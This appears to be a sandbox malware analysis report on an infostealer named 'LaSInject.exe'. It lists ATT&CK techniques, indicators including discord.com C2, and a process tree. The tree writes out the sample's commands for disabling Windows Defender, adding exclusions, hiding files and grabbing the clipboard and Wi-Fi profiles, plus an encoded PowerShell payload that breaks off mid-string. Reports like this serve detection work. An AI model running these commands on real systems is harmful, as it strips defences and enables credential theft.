0febdcc57349da7a79710b6cf65c7d6c73dfaeaad3ff7bafb73b936a7e222b4a

Analysis

max time kernel
440s
max time network
442s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19/01/2025, 21:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LaSInject/LaSInject.exe
Size

6.9MB
MD5

b00cc9195c7f6c078ee86baa3275ead3
SHA1

0c5e32dbf11ed61bfdec3ad321f83c8e66224520
SHA256

ed361180fb612d5ae7a8eeab2d8d0a1657bd8bbed655fb43418bbffb080ac13b
SHA512

80327efe6b98253edccf69df53b8ac432c390f3c2b040e117c4c4ba9b13a90adc4c16bbcd2b8333328bd8bc847f1f4f423e241a446bed9b2e006697e11bd81a8
SSDEEP

196608:G1V1vFddB6ylnlPzf+JiJCsmFMvQn6hqgdh0:6FnBRlnlPSa7mmvQpgdh0

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1028	powershell.exe
4852	powershell.exe
2548	powershell.exe
4252	powershell.exe
1360	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	LaSInject.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3280	cmd.exe
2388	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4924	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe
4780	LaSInject.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com
15	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5108	tasklist.exe
4092	tasklist.exe
2452	tasklist.exe
4748	tasklist.exe
4532	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1244	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b80-21.dat	upx
behavioral2/memory/4780-25-0x00007FFDB5B20000-0x00007FFDB610A000-memory.dmp	upx
behavioral2/files/0x000a000000023b73-27.dat	upx
behavioral2/memory/4780-29-0x00007FFDC8470000-0x00007FFDC8493000-memory.dmp	upx
behavioral2/files/0x000a000000023b7e-31.dat	upx
behavioral2/files/0x000a000000023b7d-33.dat	upx
behavioral2/memory/4780-48-0x00007FFDCE570000-0x00007FFDCE57F000-memory.dmp	upx
behavioral2/files/0x000a000000023b7a-47.dat	upx
behavioral2/files/0x000a000000023b79-46.dat	upx
behavioral2/files/0x000a000000023b78-45.dat	upx
behavioral2/files/0x000a000000023b77-44.dat	upx
behavioral2/files/0x000a000000023b76-43.dat	upx
behavioral2/files/0x000a000000023b75-42.dat	upx
behavioral2/files/0x000a000000023b74-41.dat	upx
behavioral2/files/0x0031000000023b72-40.dat	upx
behavioral2/files/0x000a000000023b85-39.dat	upx
behavioral2/files/0x000a000000023b84-38.dat	upx
behavioral2/files/0x000a000000023b83-37.dat	upx
behavioral2/files/0x000a000000023b7f-34.dat	upx
behavioral2/memory/4780-54-0x00007FFDC4AF0000-0x00007FFDC4B1D000-memory.dmp	upx
behavioral2/memory/4780-56-0x00007FFDCCBA0000-0x00007FFDCCBB9000-memory.dmp	upx
behavioral2/memory/4780-58-0x00007FFDC4AC0000-0x00007FFDC4AE3000-memory.dmp	upx
behavioral2/memory/4780-60-0x00007FFDC4310000-0x00007FFDC447F000-memory.dmp	upx
behavioral2/memory/4780-64-0x00007FFDC82D0000-0x00007FFDC82DD000-memory.dmp	upx
behavioral2/memory/4780-63-0x00007FFDC4AA0000-0x00007FFDC4AB9000-memory.dmp	upx
behavioral2/memory/4780-66-0x00007FFDC4A70000-0x00007FFDC4A9E000-memory.dmp	upx
behavioral2/memory/4780-74-0x00007FFDC8470000-0x00007FFDC8493000-memory.dmp	upx
behavioral2/memory/4780-73-0x00007FFDB52E0000-0x00007FFDB5655000-memory.dmp	upx
behavioral2/memory/4780-71-0x00007FFDB5660000-0x00007FFDB5718000-memory.dmp	upx
behavioral2/memory/4780-70-0x00007FFDB5B20000-0x00007FFDB610A000-memory.dmp	upx
behavioral2/memory/4780-76-0x00007FFDC4980000-0x00007FFDC4994000-memory.dmp	upx
behavioral2/memory/4780-79-0x00007FFDC4D10000-0x00007FFDC4D1D000-memory.dmp	upx
behavioral2/memory/4780-78-0x00007FFDC4AF0000-0x00007FFDC4B1D000-memory.dmp	upx
behavioral2/memory/4780-81-0x00007FFDB4580000-0x00007FFDB469C000-memory.dmp	upx
behavioral2/memory/4780-108-0x00007FFDC4310000-0x00007FFDC447F000-memory.dmp	upx
behavioral2/memory/4780-107-0x00007FFDC4AC0000-0x00007FFDC4AE3000-memory.dmp	upx
behavioral2/memory/4780-165-0x00007FFDC4AA0000-0x00007FFDC4AB9000-memory.dmp	upx
behavioral2/memory/4780-269-0x00007FFDC4A70000-0x00007FFDC4A9E000-memory.dmp	upx
behavioral2/memory/4780-272-0x00007FFDB5660000-0x00007FFDB5718000-memory.dmp	upx
behavioral2/memory/4780-288-0x00007FFDB52E0000-0x00007FFDB5655000-memory.dmp	upx
behavioral2/memory/4780-290-0x00007FFDB5B20000-0x00007FFDB610A000-memory.dmp	upx
behavioral2/memory/4780-296-0x00007FFDC4310000-0x00007FFDC447F000-memory.dmp	upx
behavioral2/memory/4780-291-0x00007FFDC8470000-0x00007FFDC8493000-memory.dmp	upx
behavioral2/memory/4780-349-0x00007FFDC4A70000-0x00007FFDC4A9E000-memory.dmp	upx
behavioral2/memory/4780-352-0x00007FFDC4D10000-0x00007FFDC4D1D000-memory.dmp	upx
behavioral2/memory/4780-351-0x00007FFDC4980000-0x00007FFDC4994000-memory.dmp	upx
behavioral2/memory/4780-350-0x00007FFDB5660000-0x00007FFDB5718000-memory.dmp	upx
behavioral2/memory/4780-348-0x00007FFDC4310000-0x00007FFDC447F000-memory.dmp	upx
behavioral2/memory/4780-347-0x00007FFDC4AA0000-0x00007FFDC4AB9000-memory.dmp	upx
behavioral2/memory/4780-346-0x00007FFDC82D0000-0x00007FFDC82DD000-memory.dmp	upx
behavioral2/memory/4780-345-0x00007FFDC4AC0000-0x00007FFDC4AE3000-memory.dmp	upx
behavioral2/memory/4780-344-0x00007FFDCCBA0000-0x00007FFDCCBB9000-memory.dmp	upx
behavioral2/memory/4780-343-0x00007FFDC4AF0000-0x00007FFDC4B1D000-memory.dmp	upx
behavioral2/memory/4780-342-0x00007FFDCE570000-0x00007FFDCE57F000-memory.dmp	upx
behavioral2/memory/4780-341-0x00007FFDC8470000-0x00007FFDC8493000-memory.dmp	upx
behavioral2/memory/4780-340-0x00007FFDB52E0000-0x00007FFDB5655000-memory.dmp	upx
behavioral2/memory/4780-339-0x00007FFDB4580000-0x00007FFDB469C000-memory.dmp	upx
behavioral2/memory/4780-325-0x00007FFDB5B20000-0x00007FFDB610A000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4048	cmd.exe
3108	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2752	cmd.exe
1568	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3496	WMIC.exe
1172	WMIC.exe
4748	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4032	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3108	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2548	powershell.exe
4252	powershell.exe
2548	powershell.exe
4252	powershell.exe
1360	powershell.exe
1360	powershell.exe
2388	powershell.exe
2388	powershell.exe
3460	powershell.exe
3460	powershell.exe
2388	powershell.exe
3460	powershell.exe
1028	powershell.exe
1028	powershell.exe
4200	powershell.exe
4200	powershell.exe
4852	powershell.exe
4852	powershell.exe
3312	powershell.exe
3312	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5108	tasklist.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: 36	1628	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: 36	1628	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3496	WMIC.exe
Token: SeSecurityPrivilege	3496	WMIC.exe
Token: SeTakeOwnershipPrivilege	3496	WMIC.exe
Token: SeLoadDriverPrivilege	3496	WMIC.exe
Token: SeSystemProfilePrivilege	3496	WMIC.exe
Token: SeSystemtimePrivilege	3496	WMIC.exe
Token: SeProfSingleProcessPrivilege	3496	WMIC.exe
Token: SeIncBasePriorityPrivilege	3496	WMIC.exe
Token: SeCreatePagefilePrivilege	3496	WMIC.exe
Token: SeBackupPrivilege	3496	WMIC.exe
Token: SeRestorePrivilege	3496	WMIC.exe
Token: SeShutdownPrivilege	3496	WMIC.exe
Token: SeDebugPrivilege	3496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3496	WMIC.exe
Token: SeRemoteShutdownPrivilege	3496	WMIC.exe
Token: SeUndockPrivilege	3496	WMIC.exe
Token: SeManageVolumePrivilege	3496	WMIC.exe
Token: 33	3496	WMIC.exe
Token: 34	3496	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1852 wrote to memory of 4780	1852	LaSInject.exe	82
PID 1852 wrote to memory of 4780	1852	LaSInject.exe	82
PID 4780 wrote to memory of 3588	4780	LaSInject.exe	83
PID 4780 wrote to memory of 3588	4780	LaSInject.exe	83
PID 4780 wrote to memory of 3716	4780	LaSInject.exe	84
PID 4780 wrote to memory of 3716	4780	LaSInject.exe	84
PID 4780 wrote to memory of 4500	4780	LaSInject.exe	85
PID 4780 wrote to memory of 4500	4780	LaSInject.exe	85
PID 4780 wrote to memory of 2016	4780	LaSInject.exe	86
PID 4780 wrote to memory of 2016	4780	LaSInject.exe	86
PID 3716 wrote to memory of 2548	3716	cmd.exe	91
PID 3716 wrote to memory of 2548	3716	cmd.exe	91
PID 2016 wrote to memory of 5108	2016	cmd.exe	92
PID 2016 wrote to memory of 5108	2016	cmd.exe	92
PID 4500 wrote to memory of 3732	4500	cmd.exe	93
PID 4500 wrote to memory of 3732	4500	cmd.exe	93
PID 3588 wrote to memory of 4252	3588	cmd.exe	94
PID 3588 wrote to memory of 4252	3588	cmd.exe	94
PID 4780 wrote to memory of 3940	4780	LaSInject.exe	95
PID 4780 wrote to memory of 3940	4780	LaSInject.exe	95
PID 3940 wrote to memory of 1628	3940	cmd.exe	98
PID 3940 wrote to memory of 1628	3940	cmd.exe	98
PID 4780 wrote to memory of 3136	4780	LaSInject.exe	99
PID 4780 wrote to memory of 3136	4780	LaSInject.exe	99
PID 3136 wrote to memory of 4476	3136	cmd.exe	101
PID 3136 wrote to memory of 4476	3136	cmd.exe	101
PID 4780 wrote to memory of 4856	4780	LaSInject.exe	102
PID 4780 wrote to memory of 4856	4780	LaSInject.exe	102
PID 4856 wrote to memory of 2844	4856	cmd.exe	104
PID 4856 wrote to memory of 2844	4856	cmd.exe	104
PID 4780 wrote to memory of 4452	4780	LaSInject.exe	105
PID 4780 wrote to memory of 4452	4780	LaSInject.exe	105
PID 4452 wrote to memory of 3496	4452	cmd.exe	107
PID 4452 wrote to memory of 3496	4452	cmd.exe	107
PID 4780 wrote to memory of 868	4780	LaSInject.exe	108
PID 4780 wrote to memory of 868	4780	LaSInject.exe	108
PID 868 wrote to memory of 1172	868	cmd.exe	110
PID 868 wrote to memory of 1172	868	cmd.exe	110
PID 4780 wrote to memory of 1244	4780	LaSInject.exe	111
PID 4780 wrote to memory of 1244	4780	LaSInject.exe	111
PID 4780 wrote to memory of 1972	4780	LaSInject.exe	113
PID 4780 wrote to memory of 1972	4780	LaSInject.exe	113
PID 1244 wrote to memory of 3184	1244	cmd.exe	115
PID 1244 wrote to memory of 3184	1244	cmd.exe	115
PID 1972 wrote to memory of 1360	1972	cmd.exe	116
PID 1972 wrote to memory of 1360	1972	cmd.exe	116
PID 4780 wrote to memory of 4488	4780	LaSInject.exe	117
PID 4780 wrote to memory of 4488	4780	LaSInject.exe	117
PID 4780 wrote to memory of 4912	4780	LaSInject.exe	118
PID 4780 wrote to memory of 4912	4780	LaSInject.exe	118
PID 4780 wrote to memory of 3020	4780	LaSInject.exe	121
PID 4780 wrote to memory of 3020	4780	LaSInject.exe	121
PID 4488 wrote to memory of 4092	4488	cmd.exe	123
PID 4488 wrote to memory of 4092	4488	cmd.exe	123
PID 4780 wrote to memory of 3280	4780	LaSInject.exe	124
PID 4780 wrote to memory of 3280	4780	LaSInject.exe	124
PID 4780 wrote to memory of 540	4780	LaSInject.exe	125
PID 4780 wrote to memory of 540	4780	LaSInject.exe	125
PID 4912 wrote to memory of 2452	4912	cmd.exe	127
PID 4912 wrote to memory of 2452	4912	cmd.exe	127
PID 4780 wrote to memory of 3352	4780	LaSInject.exe	128
PID 4780 wrote to memory of 3352	4780	LaSInject.exe	128
PID 3020 wrote to memory of 4716	3020	cmd.exe	131
PID 3020 wrote to memory of 4716	3020	cmd.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3312	attrib.exe
1328	attrib.exe
3184	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe
"C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1852
- C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe
  "C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('OpenMta', 0, 'Injectado', 16+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4500
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('OpenMta', 0, 'Injectado', 16+16);close()"
      4⤵
      PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3136
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4856
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1244
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\LaSInject\LaSInject.exe"
      4⤵
      Views/modifies file attributes
      PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:540
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3352
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2752
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1440
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:848
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQ